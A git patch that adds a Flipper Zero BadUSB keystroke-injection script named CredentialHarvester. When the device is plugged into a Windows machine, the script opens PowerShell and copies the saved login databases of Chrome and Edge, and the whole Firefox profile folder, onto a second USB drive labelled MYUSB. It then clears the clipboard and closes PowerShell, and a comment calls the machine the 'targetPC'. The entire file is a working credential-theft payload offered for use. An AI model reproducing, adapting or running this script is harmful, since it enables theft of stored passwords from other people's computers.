From 6132354ec1059c07ea925fe19b51d2f5c3874e99 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Mon, 13 May 2024 11:47:56 -0400
Subject: [PATCH] Create CredentialHarvester

---
 CredentialHarvester | 60 +++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 60 insertions(+)
 create mode 100644 CredentialHarvester

diff --git a/CredentialHarvester b/CredentialHarvester
new file mode 100644
index 0000000..1821f1a
--- /dev/null
+++ b/CredentialHarvester
@@ -0,0 +1,60 @@
+REM This script was created by github.com/markcyber
+REM This script requires a secondary USB named "MYUSB" to save credentials to
+REM The extracted data will require decryption
+
+REM Set delay for Flipper Zero
+DELAY 1000
+
+REM Open PowerShell with elevated privileges
+GUI r
+DELAY 500
+STRING powershell
+DELAY 500
+ENTER
+DELAY 1000
+
+REM Check if the USB drive exists
+STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter;
+STRING if ($usbDrive -ne $null) {
+ENTER
+DELAY 500
+STRING cd $usbDrive;
+ENTER
+DELAY 500
+STRING mkdir BrowserData;
+ENTER
+DELAY 500
+STRING cd BrowserData;
+ENTER
+DELAY 500
+
+REM Copy Chrome Login Data to USB
+STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
+STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; }
+ENTER
+DELAY 500
+
+REM Copy Firefox Login Data to USB
+STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
+STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; }
+ENTER
+DELAY 500
+
+REM Copy Edge Login Data to USB
+STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
+STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; }
+ENTER
+DELAY 500
+STRING }
+ENTER
+DELAY 500
+
+REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on targetPC)
+STRING echo off | clip
+ENTER
+DELAY 500
+
+REM Close PowerShell
+STRING exit
+ENTER
+DELAY 500